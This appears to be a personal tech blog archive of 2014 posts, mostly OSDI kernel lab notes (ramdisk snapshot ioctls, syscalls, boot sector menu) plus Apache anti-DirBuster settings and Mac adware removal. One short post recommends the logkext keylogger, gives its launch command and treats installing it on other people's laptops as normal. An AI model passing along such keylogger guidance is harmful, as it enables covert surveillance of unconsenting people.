This is the 8th lab of the OSDI course. This one is fun and interesting. We were asked to write snapshot code in the kernel, so that we can go back to a past state of a block device.

How to Implement

We are adding two new ioctl numbers to the block device: one is SNAPSHOT, the other is ROLLBACK. On SNAPSHOT, the kernel code switches to snapshot mode, and data is written into shadow pages instead of normal pages. On ROLLBACK, the shadow pages are removed, and we are back at the previous state (the snapshot).

Edit drivers/block/brd.c

I am editing the kernel code on version (original here)

Global and Macros

  • pick unused ioctl (I/O control) numbers for our custom ioctls
  • a MASK for distinguishing normal pages from shadow pages in page->index. I am using the most significant bit: if it is 1, it's a shadow page; otherwise, it's a normal page.
    • #define SHADOW_MASK (1UL << ((sizeof(pgoff_t))*8-1))

Modify brd_lookup_page

Add the following to handle page lookup actions when snapshot is enabled:
    if( snapshot_enable ) {
        // is read request? yes
        // read from shadow page if exist
        idx = (sector >> PAGE_SECTORS_SHIFT) | SHADOW_MASK; // shadow
        page = radix_tree_lookup(&brd->brd_pages, idx);

        BUG_ON(page && page->index != idx);
        if( page ){
            printk("[osdi] one shadow page is created\n");
            return page;
        }
    }
This means that when snapshot mode is enabled, we return the shadow page if it exists.

Modify brd_insert_page

Add the following code at the beginning:
if (!snapshot_enable && page)   return page;
if (snapshot_enable && page && ((page->index & SHADOW_MASK)!=0))    return page;

And, add the following line before "radix_tree_insert":
if (snapshot_enable)    idx |= SHADOW_MASK;
So, in snapshot mode, we always insert pages as shadow pages (if there's no shadow page for the index yet, we create one). Outside snapshot mode, we follow the old rules.

Modify brd_ioctl

Make sure that we detect the new ioctl numbers and call their handlers.

static int brd_ioctl(struct block_device *bdev, fmode_t mode,
                        unsigned int cmd, unsigned long arg)
{
    int error;
    struct brd_device *brd = bdev->bd_disk->private_data;

    if (cmd == BLKFLSBUF) {
        /* ... original BLKFLSBUF handling, unchanged (it sets error) ... */
        return error;
    }
    else if (cmd == SNAPSHOT) {
        error = snapshot_handler();
        return error;
    }
    else if (cmd == ROLLBACK) {
        error = rollback_handler(bdev);
        return error;
    }
    return -ENOTTY;
}


static int snapshot_handler(void) {
    snapshot_enable = TRUE;
    return 0;
}

static int rollback_handler(struct block_device *bdev) {
    int error = 0;
    struct brd_device *brd = bdev->bd_disk->private_data;

    snapshot_enable = FALSE;
    /* ... the shadow pages are freed here with brd_free_shadow_pages(brd);
       that part is elided in this excerpt ... */

    if(error)   printk("[osdi] error = %d\n", error);
    return error;
}

* brd_free_shadow_pages is almost the same as brd_free_pages, but adds "if( (pages[i]->index & SHADOW_MASK)==0 )" at the beginning of the for loop, so that normal pages are left alone.
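The whole snapshot/rollback idea can be tried in user space before touching the kernel. The following is only a toy model under my own assumptions: a fixed array instead of the radix tree, whole-page writes only, and made-up names (toy_disk, toy_write, and so on). It is not the code in brd.c.

```c
#include <stdbool.h>
#include <stdio.h>
#include <string.h>

#define TOY_NPAGES     4    /* hypothetical: a tiny 4-page "disk" */
#define TOY_PAGE_BYTES 16   /* hypothetical page size */

struct toy_disk {
    char normal[TOY_NPAGES][TOY_PAGE_BYTES];
    char shadow[TOY_NPAGES][TOY_PAGE_BYTES];
    bool has_shadow[TOY_NPAGES];
    bool snapshot_enable;
};

static void toy_init(struct toy_disk *d)
{
    memset(d, 0, sizeof(*d));
}

/* Whole-page write: goes to the shadow copy while snapshot mode is on. */
static void toy_write(struct toy_disk *d, int page, const char *data)
{
    if (d->snapshot_enable) {
        snprintf(d->shadow[page], TOY_PAGE_BYTES, "%s", data);
        d->has_shadow[page] = true;
    } else {
        snprintf(d->normal[page], TOY_PAGE_BYTES, "%s", data);
    }
}

/* Read: prefer the shadow copy in snapshot mode, else the normal page. */
static const char *toy_read(const struct toy_disk *d, int page)
{
    if (d->snapshot_enable && d->has_shadow[page])
        return d->shadow[page];
    return d->normal[page];
}

static void toy_snapshot(struct toy_disk *d)
{
    d->snapshot_enable = true;
}

/* Rollback: leave snapshot mode and forget every shadow copy. */
static void toy_rollback(struct toy_disk *d)
{
    d->snapshot_enable = false;
    memset(d->has_shadow, 0, sizeof(d->has_shadow));
}
```

Writing "TEST1", calling toy_snapshot, writing "TEST2" to the same page, and then calling toy_rollback leaves "TEST1" readable again, which mirrors the mkdir test in the Run & Test part.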

Full Code ( drivers/block/brd.c )

The full code is in this codepad; please let me know if the link is not working.

User Programs

To control our devices, we need to write our user programs. Here, we will use /dev/ram0 as our block device.


#include <unistd.h>
#include <sys/ioctl.h>
#include <fcntl.h>

#include <stdio.h>

#define SNAPSHOT _IO(0x10, 30)

int main() {

    int fb;

    fb = open("/dev/ram0", O_RDWR);
    if( fb<0 ) {
        printf("can't access the device\n");
        return -1;
    }
    ioctl(fb, SNAPSHOT, 0);
    close(fb);

    return 0;
}



#include <unistd.h>
#include <sys/ioctl.h>
#include <fcntl.h>

#include <stdio.h>

#define ROLLBACK _IO(0x10, 31)

int main() {

    int fb;

    fb = open("/dev/ram0", O_RDWR);
    if( fb<0 ) {
        printf("can't access the device\n");
        return -1;
    }
    ioctl(fb, ROLLBACK, 0);
    close(fb);

    return 0;
}

        -$(CC) ROLLBACK.c -o ROLLBACK
        -$(CC) SNAPSHOT.c -o SNAPSHOT

Run & Test

  • sudo mke2fs -m 0 /dev/ram0 # format the ram partition to ext2
  • sudo mkdir /ramdisk/
  • sudo mount /dev/ram0 /ramdisk/
  • sudo mount # check if it's mounted successfully
  • sudo mkdir /ramdisk/TEST1
  • sudo umount /ramdisk/
We've created a directory called "TEST1" and unmounted the ram disk. It's time to take a snapshot!
  • sudo ./SNAPSHOT
  • sudo mount /dev/ram0 /ramdisk/
  • sudo mkdir /ramdisk/TEST2
  • sudo umount /ramdisk/
Now we've created a second directory called "TEST2", and it's time to test the rollback.
  • sudo ./ROLLBACK
  • sudo mount /dev/ram0 /ramdisk/
  • ls /ramdisk 
After the last command, we should see only the folder "TEST1" and no "TEST2". So, the snapshot works!

Question Raised

Q: Why do we always umount the device before running our SNAPSHOT or ROLLBACK user program in this lab?
A: ROLLBACK checks whether the device is in use, so we have to umount it before asking the device to roll back.

Tuesday, May 6, 2014

Vim + LaTeX


I played around with LaTeX this morning. There are different tools for compiling LaTeX files.

Online Web Tools

Writing LaTeX online is possible. It's easy to share files, and there's no need to install extra software on the machine. However, the PDF preview has a long latency. Some good web-based LaTeX editors are listed below:

Desktop GUI Tools


Desktop Command Tools

Under Fedora, install:
  • sudo yum install tetex-latex
Simple setup in .vimrc:
  • map \t <ESC>:!pdflatex %<CR><CR>

Sunday, May 4, 2014

Defend from DirBuster (avoid brute force directories and files names on web/application servers)

* Trying to brute-force directory and file names on deployed servers is ILLEGAL!

Some fake hackers like to attack deployed servers with tools like "DirBuster"; however, it's easy to defend against them. Also remember that brute-forcing a deployed server is ILLEGAL and will get you into trouble.

I am using IP as the attacker's IP here.

1. Ban the attacker's IP

In the Apache configuration file, add:
<Location />
        Order deny,allow
        Deny from
</Location>

2. Setup mod_evasive

Follow the instructions here, which are:
  • apt-get install apache2-utils
  • make sure module configuration is enabled in the Apache settings:
    • Include mods-enabled/*.load
    • Include mods-enabled/*.conf
  • configure the DOS parameters by adding the following to the .conf file of the site
<IfModule mod_evasive20.c>
DOSHashTableSize 3097
DOSPageCount 2
DOSSiteCount 50
DOSPageInterval 1
DOSSiteInterval 1
DOSBlockingPeriod 60
</IfModule>
To test, run this perl script:

3. Setup Nagios with notifications

Set up a system monitoring program on the server, so that the administrator receives an email immediately if anything abnormal happens. Check:

Saturday, May 3, 2014

Start VMWare Fusion from Script

I am now using VMWare Fusion, and I don't want to switch between the terminal and the VMWare manager. So, I came up with this script, which allows me to start the VM and ssh into the machine with a one-line command.

./kali start
./kali stop
./kali status

Wednesday, April 30, 2014

[OSDI] Read Frame Usage in Kernel Code


When a user-space process asks for memory, the kernel gives out "pages", which are located by virtual addresses. However, the kernel only gives out real physical memory when the process starts to write data to those addresses. That is, a page is backed by a real page "frame" only after its first write.
The conversion from a virtual address to a frame is done by looking up the page table. Each process has its own page table, which is reached through the process's memory descriptor.


In the Linux kernel, the structures and their hierarchy are as follows:
  • task_struct: this describes a process
    • (char *) comm: name of the process
    • (struct mm_struct *) mm: memory descriptor of the process
      • (struct vm_area_struct *)mmap: start pointer for virtual memory areas
The virtual memory areas of a process form a linked list in kernel code, so we start from the first one, which is stored in task->mm->mmap.
  • vm_area_struct: a virtual memory area
    • vm_start: start virtual address
    • vm_end: end virtual address
    • vm_next: next vm_area_struct in the linked list, NULL if it's the last one
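Walking this linked list can be practiced in user space. The sketch below uses a simplified stand-in struct (toy_vma) with only the three fields listed above, and assumes a 4096-byte page; both are my assumptions, not kernel definitions.

```c
#include <stddef.h>

/* Simplified stand-in for the kernel's struct vm_area_struct. */
struct toy_vma {
    unsigned long vm_start;     /* first address of the area */
    unsigned long vm_end;       /* first address after the area */
    struct toy_vma *vm_next;    /* next area, NULL for the last one */
};

#define TOY_PAGE_SIZE 4096UL    /* assumed page size */

/* Count how many virtual pages all areas in the list cover together. */
static unsigned long count_virtual_pages(const struct toy_vma *first)
{
    unsigned long pages = 0;
    const struct toy_vma *vma;

    for (vma = first; vma != NULL; vma = vma->vm_next)
        pages += (vma->vm_end - vma->vm_start) / TOY_PAGE_SIZE;
    return pages;
}
```

Note that this counts virtual pages only. How many of them are really backed by frames is a different number, and that is what the page table walk later in this post is for.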


To scan through all the processes and find the one we want:
struct task_struct *task;
for_each_process(task) {

    if( task == NULL )  continue;
    if( task->mm == NULL )  continue;

    if( strcmp(task->comm, "reclim-me")==0 ){
        /* found the target process; walk task->mm here */
    }
}

To scan through the virtual memory areas of one mm:

for( vma=mm->mmap ; vma!=NULL ; vma=vma->vm_next) { ... }

In the real world, the page table has several levels, which means we have to look them up one after another and check at each level whether the address is mapped:

pgd = pgd_offset(mm, address);
if (!pgd_present(*pgd)) continue;

pud = pud_offset(pgd, address);
if (!pud_present(*pud)) continue;

pmd = pmd_offset(pud, address);
if (!pmd_present(*pmd)) continue;

pte = pte_offset_map(pmd, address);

ptl = pte_lockptr(mm, pmd);
spin_lock(ptl);             /* pte_unmap_unlock() below releases this lock */
if (pte_present(*pte)) {
    sum ++;
}
pte_unmap_unlock(pte, ptl);


Finally, for this OSDI lab, we have to print out the number of frames of a process. To check the correct answer, we can use:
  • cat /proc/<pid>/statm | awk '{print $2}'
  • get_mm_rss(task->mm)
To get the state of the virtual memory areas:
  • cat /proc/<pid>/maps
However, we have to implement our own calculation in this lab, and here's the code:

By watching the number of frames of the program "reclim-me", we learned that the kernel gives out memory only when the process starts to write.


It seems that the TA mistyped "reclaim" as "reclim", which is a meaningless word; however, I keep the original name in my code on GitHub for now.


Thursday, April 24, 2014

[OSDI] Major and Minor Number for Device Nodes

As we all know, devices are operated as files under Linux. These files are listed under /dev, such as /dev/sda, /dev/ram0, etc. However, in the OSDI course, the instructor mentioned that names like sda and ram0 are only for humans to read. For the machine, each device has a major and a minor number. How they are converted is shown below (it's a one-to-one conversion):
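From user space, the numbers behind a device file can be read with stat() and the major()/minor() macros of glibc. This is just a small sketch of that idea; the helper name device_numbers is mine.

```c
#include <sys/types.h>
#include <sys/stat.h>
#include <sys/sysmacros.h>

/*
 * Hypothetical helper: look up the major and minor number of a device file.
 * Returns 0 on success and -1 if the path cannot be stat()ed.
 * st_rdev is only meaningful for device special files.
 */
static int device_numbers(const char *path, unsigned int *maj, unsigned int *min)
{
    struct stat st;

    if (stat(path, &st) != 0)
        return -1;
    *maj = major(st.st_rdev);
    *min = minor(st.st_rdev);
    return 0;
}
```

On a typical Linux machine, calling it on /dev/sda should give 8 and 0, and on /dev/ram0 it should give 1 and 0. makedev(major, minor) goes the other way and packs the two numbers into one dev_t.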


Friday, April 18, 2014

Setup Debian VMs on VMWare

To have a better experience with Debian VMs on VMWare, it's always a good idea to install "VMWare-Tool". However, some settings have to be made, and this guy has written them down:

Monday, April 14, 2014

[OSDI] Virtualization v.s. Emulation

I often ask myself what the difference between "Virtualization" and "Emulation" is. Luckily, I found a good explanation on the Internet:

Difference by Definition

Virtual machines make use of CPU self-virtualization, to whatever extent it exists, to provide a virtualized interface to the real hardware. Emulators emulate hardware without relying on the CPU being able to run code directly and redirect some operations to a hypervisor controlling the virtual container. -- stackoverflow (geekosaur)
It turns out the main difference is whether (part of) the code runs directly on the host machine (virtualization) or on software-emulated hardware (emulation).

Again, from this website, we learn:

  • Virtualization: involves simulating parts of a computer's hardware
  • Emulation: in emulation the virtual machine simulates the complete hardware in software





Wednesday, April 9, 2014

Fixed, Fluid, Adaptive, and Responsive Website Designs

It's quite common to see these names while developing websites. However, I had no chance to dig into them until today. In my understanding, these names mainly address the "dynamic width" problem that all developers face while designing a layout.


Website width varies from 800px on small mobile devices to 2560px on an expensive Macbook Pro Retina. For the best user experience, we should test the website on different devices (screen sizes) most of the time, and make sure that everything works well (or at least stays under the designer's control).

First, it's always a good idea to start the design at the size that most people are using. We can check the "Screen Resolution Statistics" here:

Second, we should test the website on different widths. The simplest way is to adjust the width of your browser, like:

Original width:

Decreased width:

Remember that it's okay to let the user scroll up and down (the height of the website is larger than the screen size), but it's a pretty BAD idea to let the user scroll left and right, since most mice don't have that kind of control button or trackball.

Design Solutions

I can still recall that in elementary school, my teacher asked me to put "screen resolution of 1024x768 pixels" at the bottom of the website. I think that's because
  • we did not have good CSS/Javascript at that time to solve the dynamic width problem,
  • users' devices mostly had the same resolution (1024x768 pixels),
  • and it's easier.
Now I have learned that this kind of website design is called "fixed-width"; it's kind of old-fashioned but classic. Here I am listing all the common design solutions:

Fixed

"a set width and resizing the browser or viewing it on different devices won’t affect on the way the website looks." -- teamtreehouse
This is the kind of design I just mentioned, and it's widely used for traditional websites. Here are some examples:

- Pro: The layout is totally under control, since the designer doesn't have to care about the screen resolution, only about the selected fixed width.
- Con: It may be hard to read on screens of different sizes; users have to scroll left and right if the website is wider than the screen.

Fluid

"built using percentages for widths. As a result, columns are relative to one another and the browser allowing it to scale up and down fluidly." -- teamtreehouse
The main point of fluid design is that columns are assigned specific "percentages" of the whole width, which means the columns keep fixed proportions no matter what the screen width is.

- Pro: The website keeps almost the same design on screens of different sizes, thanks to the fixed proportions.
- Con: The design breaks if the screen is too narrow. For example, 20% of an 800px mobile screen is 160px, which may not be wide enough to display the original content. Therefore, it may be a good idea to set a minimum website width (apply "min-width" in CSS).

Adaptive

"introduce media queries to target specific device sizes, like smaller monitors, tablets, and mobile." -- teamtreehouse
Adaptive website designs offer several layouts based on different types of devices, such as smaller monitors, tablets, and mobiles. Just as an example (which may not match real-world practice), they may apply an "original layout template" for widths over 1024px, a "tablet layout template" for widths between 600px and 1024px, and a "mobile layout template" for widths less than 600px. A really good explanation I found is on this website.

* Some people think adaptive designs are the same as responsive designs (which I will describe later). I think they are similar, with slight differences.


Smaller Screen:


- Pro: This works pretty well on most screens; it offers different layout templates based on the device type (traditional monitor, tablet, mobile, etc).
- Con: Instead of designing "one" layout, the designer has to produce "several" layouts.

Responsive

"built on a fluid grid and use media queries to control the design and its content as it scales down or up with the browser or device." -- teamtreehouse
It's pretty much the same as the adaptive design, but it applies the "fluid" design to the different templates that target different types of devices. I believe this design offers the best user experience, since the designer has to care about the layout at every screen size.

- Pro: I think this is the best design for websites; it takes care of every layout possibility for users on any device.
- Con: It may cost a lot to reach this design, and the code can be complex. More tests are needed to make sure there are no bugs.


  • Lots of websites do not support mobile devices on the same page, but offer a separate version instead. They detect the device you are using and redirect you to the mobile version if you're on a mobile device. Example is here: and
  • To detect the screen width (viewport width), we should apply "CSS Media Queries".


I drew this graph as the summary of this post; please tell me if there's any mistake in it. Also, I believe that these designs are just "principles", which means that we don't have to stick to any one of them, but can use them wisely in different situations.


* thanks Shumin for raising this topic

Keylogger for Mac OS X

For security or hacking purposes, people install keyloggers on their own laptops or on other people's laptops. It's quite interesting to play around with this kind of program.

logkext: (this contains version 2.4 at this point)
However, there are no compiled packages on its GitHub. The older version 2.3 at Google Code has compiled packages.

This is an open source keylogger for Mac; to start the application, simply type "sudo logKextClient".

Friday, April 4, 2014

Removing Virus (Mac)

I found that my Chrome has been acting weird these days. Strange Ads pop up on lots of websites, and I had no idea how to turn them off. So I started to look for a solution.

Here are some steps that may help in most cases, but did not help in this case:

  • Turn off extensions/plugins, so that there won't be unwanted js code while loading websites. => However, the problem remained, and different browsers had the same problem (tested on Chrome and Safari)
  • Clean cookies and other personal settings  => did not help
  • Remove everything under "~/Library/Application\ Support/Google/" and "/Library/Application\ Support/Google/", then reinstall Chrome => did not help, since the problem happens in different browsers

So, I started to trace the problem in Chrome Developer Tools (Network):

  1. The right and original request for Google Search.
  2. Chrome is trying to get; however this is the problem.
  3. After getting get-js, Chrome starts to run sf_main, which loads the Ads
  4. direct.html is the iframe for the Ads
The root problem is that "somebody" requests get-js while I am browsing websites, but I don't know who it is.

However, it's easy to block the request by adding into the blacklist:
  • vim /etc/hosts
  • add
Then the get-js request will be blocked:

The Ads are removed now.

Better Solution

Thanks to Niccolò Ventura and Steven Foong for offering solutions in the comments of this post. I am writing them down here as a conclusion:
>> sudo rm -r /Library/LaunchAgents/com.vsearch.agent.plist /Library/LaunchAgents/com.vsearch.daemon.plist /Library/LaunchAgents/com.vsearch.helper.plist /Library/Frameworks/VSearch.framework # so the virus won't auto-start when the system is up
>> sudo rm -fr /Library/Application\ Support/VSearch/ # remove the virus

Wednesday, March 26, 2014

[OSDI] Adding a New System Call in Linux Kernel


  1. modify arch/x86/kernel/syscall_table_32.S
  2. modify arch/x86/include/asm/unistd_32.h
  3. modify arch/x86/include/asm/syscalls.h
  4. modify arch/x86/kernel/Makefile
  5. add and implement arch/x86/kernel/hello.c
  6. make && sudo make modules_install && sudo make install && sudo reboot (Compile Kernel)

modify arch/x86/kernel/syscall_table_32.S

this file contains all the syscall names, so add a new line for our new system call at the end of the file
add .long sys_mycall at the end

modify arch/x86/include/asm/unistd_32.h

add #define __NR_mycall 338 before #ifdef __KERNEL__
modify #define NR_syscalls to the old value + 1 (there is now one more system call)

modify arch/x86/include/asm/syscalls.h

the interface (declaration) of the system calls
add asmlinkage int sys_mycall(void); after asmlinkage long sys_mmap(...);

modify arch/x86/kernel/Makefile

make sure the new system call will be compiled
add obj-y += hello.o after obj-y := process... (the object name must match the new source file, hello.c)

add and implement arch/x86/kernel/hello.c

#include <linux/kernel.h>
#include <linux/linkage.h>
asmlinkage int sys_mycall(void) {
    printk("Hello, how are you?\n");
    return 0;
}


  • modify /usr/include/asm/unistd_32.h
  • modify /usr/include/bits/syscall.h
  • write a program to test it
  • see the output in dmesg
modify /usr/include/asm/unistd_32.h
add #define __NR_mycall 338 at the end, before #endif (the number must be the same as the one added to the kernel's unistd_32.h)
modify /usr/include/bits/syscall.h
add #define SYS_mycall __NR_mycall at the end of the file
write a program to test it

#include <syscall.h>
#include <unistd.h>
#include <stdio.h>
int main() {
    int r;
    r = syscall(__NR_mycall);
    printf("return value = %d\n", r);
    return 0;
}

see the output in dmesg
simply type "dmesg" to check if the output is there
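Before rebooting into the new kernel, the same syscall() wrapper can be tried with a number that already exists, which is a quick way to check the test program itself. A minimal sketch, where call_by_number is a name I made up:

```c
#ifndef _GNU_SOURCE
#define _GNU_SOURCE             /* for the syscall() declaration in glibc */
#endif
#include <unistd.h>
#include <sys/syscall.h>

/* Hypothetical helper: invoke a system call that takes no arguments by its number. */
static long call_by_number(long nr)
{
    return syscall(nr);
}
```

For example, call_by_number(SYS_getpid) returns the same value as getpid(). If the number is not known to the running kernel, syscall() returns -1 and sets errno to ENOSYS, which is what the test program above would show on a kernel without the new system call.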


Tuesday, March 25, 2014

[OSDI] Compile Kernel (Commands)

Compile Kernel

  • cp ./.config ./.config.bk
  • cp /boot/config-<tab> ./.config
  • make menuconfig
  • make ### compile to create a compressed kernel image
  • make modules ### compile the kernel modules
  • sudo make modules_install ###install kernel modules
  • sudo make install ###install kernel itself


Monday, March 24, 2014

Add a New User with Home and in Sudoer

Ha, I can't memorise this one, so I am taking a note here.
  • sudo useradd -d /home/heron -m heron
  • sudo passwd heron
  • sudo adduser heron sudo
    • (Fedora) gpasswd wheel -a heron
    • (Fedora) visudo -> remove '#' in front of %wheel

Thursday, March 20, 2014

TODO and FIXME List in VIM

Programmers like to leave "TODO" or "FIXME" in comments to remind themselves that something is unfinished or unsolved. It's not only a reminder, but also a good way to notify co-workers that "there's something we need to fix", which works better than email/IMs.

Setting up a "TODO" and "FIXME" list in VIM is fairly simple; just add the following line to ~/.vimrc:
command Todo noautocmd vimgrep /TODO\|FIXME/j ** | cw
Type ":Todo" in VIM to get the list.


GNU Split Screen

Notes for split screen commands

  • ctrl+a shift+\ : create new vertically split window
  • ctrl+a shift+s : create new horizontally split window
  • ctrl+a Tab : move cursor to the other window
  • ctrl+a shift+x : close current window

*Enable vertical split on Mac:
* Meet bug ("pty.c:38:26: fatal error: sys/stropts.h: No such file or directory") on Fedora:

Tuesday, March 18, 2014

[OSDI] Ways for Protecting Shared Data/Process Problems

Ways for protecting shared data/process problems
  1. atomic operation:
    • use a single variable as a lock, and check it before entering the critical section
  2. disable interrupt:
    • sometimes it's not necessary
    • costs a lot
  3. interrupt mask
    • device driver interrupt handler
  4. program reentry
  5. disable kernel preemption
  6. spin lock
    • implemented by atomic operation
    • spins in a loop (busy-waits) while it's locked
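The last item, a spin lock built on an atomic operation, can be sketched in user space with C11 atomics. This is not the kernel's spinlock_t, only an illustration of the idea; the toy_spin_* names are made up.

```c
#include <stdatomic.h>
#include <stdbool.h>

/* Toy spin lock: one atomic flag, set while the lock is held. */
struct toy_spinlock {
    atomic_flag locked;
};

#define TOY_SPINLOCK_INIT { ATOMIC_FLAG_INIT }

/* Try once: test-and-set returns the old value, so false means we got the lock. */
static bool toy_spin_trylock(struct toy_spinlock *l)
{
    return !atomic_flag_test_and_set_explicit(&l->locked, memory_order_acquire);
}

/* Busy-wait until the lock is free. */
static void toy_spin_lock(struct toy_spinlock *l)
{
    while (!toy_spin_trylock(l))
        ;   /* spin */
}

static void toy_spin_unlock(struct toy_spinlock *l)
{
    atomic_flag_clear_explicit(&l->locked, memory_order_release);
}
```

The test-and-set is the atomic operation here: checking the flag and setting it happen in one step, so two threads can never both see "free" and enter the critical section together.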

Wednesday, March 12, 2014

Create New Git Repo

Yep, this should be basic, but I can never memorise the commands, so I am writing them down here.

p.s. let's use for example.

On Git Server Side

  • mkdir heron-web.git
  • cd heron-web.git/
  • git init --bare

In My Local Code Directory

  • cd <path-to-the-code>
  • git init
  • vim .gitignore
  • git add -A
  • git commit -a -m "init commit"
  • git remote add original
  • git push -u original master

Clone in Other Place

  • git clone
  • cd heron-web

[OSDI] Modifying bootsect.s on Linux v0.11 for Multi Booting Support

In Linux v0.11, the boot code is written in x86 assembly. It took me a little while to understand the code and modify it for the OSDI assignment.

In the assignment, we have to add a new bootable section to the floppy disk and boot into that section. This part is described in the assignment document. Then, we have to let the user select which section to boot: linux v0.11 or our new section (hello.s).

First we print our custom message by calling "int $0x10", then read the pressed key by calling "int $0x16". By looking up the ASCII table, we check whether the key is '1' (0x31) or '2' (0x32) and boot the corresponding section.

Write "hello binary image" into Floppy Second Section

I modified tools/ as below, so that our hello.s goes into the second section.
# -- a shell version of build.c for the new bootsect.s & setup.s
# author: falcon <>
# update: 2008-10-10

hello_img=$5    # [OSDI lab2]

# Set the biggest sys_size
# Changes from 0x20000 to 0x30000 by tigercn to avoid oversized code.

# set the default "device" file for root image file
if [ -z "$root_dev" ]; then

# Write bootsect (512 bytes, one sector) to stdout
[ ! -f "$bootsect" ] && echo "there is no bootsect binary file there" && exit -1
dd if=$bootsect bs=512 count=1 of=$IMAGE 2>&1 >/dev/null

# [OSDI lab2] add custom hello program
[ ! -f "$hello_img" ] && echo "there is no hello binary file there" && exit -1
dd if=$hello_img seek=1 bs=512 count=1 of=$IMAGE 2>&1 >/dev/null

# Write setup(4 * 512bytes, four sectors) to stdout
[ ! -f "$setup" ] && echo "there is no setup binary file there" && exit -1
dd if=$setup seek=2 bs=512 count=4 of=$IMAGE 2>&1 >/dev/null

# Write system(< SYS_SIZE) to stdout
[ ! -f "$system" ] && echo "there is no system binary file there" && exit -1
system_size=`wc -c $system |cut -d" " -f1`
[ $system_size -gt $SYS_SIZE ] && echo "the system binary is too big" && exit -1
dd if=$system seek=6 bs=512 count=$((2888-1-4)) of=$IMAGE 2>&1 >/dev/null

# Set "device" for the root image file
echo -ne "\x$DEFAULT_MINOR_ROOT\x$DEFAULT_MAJOR_ROOT" | dd ibs=1 obs=1 count=2 seek=508 of=$IMAGE conv=notrunc  2>&1 >/dev/null
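The seek values in the dd commands above fix the layout of the image. Here is a small sketch of the arithmetic, with names of my own choosing (sector_to_offset, bios_sector_number); the sector numbers themselves come from the script.

```c
#define SECTOR_SIZE 512L

/* Image layout taken from the dd seek= values (0-based sectors). */
enum {
    BOOTSECT_SECTOR = 0,    /* 1 sector  */
    HELLO_SECTOR    = 1,    /* 1 sector, the new hello image */
    SETUP_SECTOR    = 2,    /* 4 sectors */
    SYSTEM_SECTOR   = 6     /* the rest  */
};

/* Byte offset in the image file where a 0-based sector starts. */
static long sector_to_offset(long sector)
{
    return sector * SECTOR_SIZE;
}

/* BIOS int 0x13 counts sectors from 1, so add one to the dd seek value. */
static int bios_sector_number(long dd_seek)
{
    return (int)dd_seek + 1;
}
```

So hello starts at byte 512 of the image and is sector 2 for the BIOS, while setup moves to sector 3 and the system starts at byte 3072.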

Put Custom "hello.s" Section into the Directory

Yes, put "hello.s" under boot/. However, the hello.s I am using is not my work but the TA's, so it may not be a good idea to put the code here.

Modify Makefile

Add the following things in boot/Makefile:
hello: hello.s
    @$(AS) -o hello.o hello.s
    @$(LD) $(LDFLAGS) -o hello hello.o
    @objcopy -R .pdr -R .comment -R.note -S -O binary hello

And, add the following things in ./Makefile:
Image: boot/bootsect boot/setup tools/system boot/hello
    @cp -f tools/system system.tmp
    @strip system.tmp
    @objcopy -O binary -R .note -R .comment system.tmp tools/kernel

    @tools/ boot/bootsect boot/setup tools/kernel Image boot/hello $(ROOT_DEV)
    @rm system.tmp
    @rm tools/kernel -f
boot/hello: boot/hello.s
    @make hello -C boot

Modify bootsect.s

And, here's the code I added in boot/bootsect.s:

# [OSDI lab2]: booting selection here
# print some message first
    mov     $0x03, %ah              # read cursor pos
    xor     %bh, %bh
    int     $0x10
    mov     $24, %cx
    mov     $0x0007, %bx            # page 0, attribute 7 (normal)
    mov     $msg2, %bp
    mov     $0x1301, %ax            # write string, move cursor
    int     $0x10
read_key:
    mov     $0x0000, %ax            # AH=0: wait for a key press
    int     $0x16
    cmp     $0x31, %al              # '1': boot linux v0.11
    je      load_setup
    cmp     $0x32, %al              # '2': boot hello
    je      load_hello
    jmp     read_key
# you can implement the load hello image code at here
load_hello:
    mov     $0x0000, %dx            # drive 0, head 0
    mov     $0x0002, %cx            # hello is in sector 2, track 0 [OSDI lab2] edited
    mov     $0x0200, %bx            # address = 512, in INITSEG
    mov $0x0201, %ax                # service 2, nr of sectors
    int     $0x13                       # read it
    jnc     ok_load_hello           # ok - continue
    mov     $0x0000, %dx
    mov     $0x0000, %ax            # reset the diskette
    int     $0x13
    jmp     load_hello
# Get disk drive parameters, specifically nr of sectors/track
    mov     $0x00, %dl
    mov     $0x0800, %ax            # AH=8 is get drive parameters
    int     $0x13
    mov     $0x00, %ch
    mov     %cx, %cs:sectors+0      # %cs means sectors is in %cs, [H]: not understanding
    mov     $SYSSEG, %ax
    mov     %ax, %es                # segment of 0x010000
    call    read_it
    call    kill_motor
# load the setup-sectors directly after the bootblock.
# Note that 'es' is already set up.



* thanks Schwannden Kuo for correcting my English